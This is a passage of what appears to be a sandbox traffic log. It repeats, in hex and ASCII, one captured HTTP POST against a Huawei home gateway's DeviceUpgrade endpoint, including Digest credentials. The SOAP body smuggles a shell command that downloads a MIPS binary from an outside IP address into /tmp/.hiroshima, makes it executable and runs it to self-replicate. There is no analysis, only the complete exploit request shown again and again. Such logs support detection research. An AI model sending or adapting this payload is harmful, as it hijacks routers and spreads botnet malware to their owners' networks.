2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 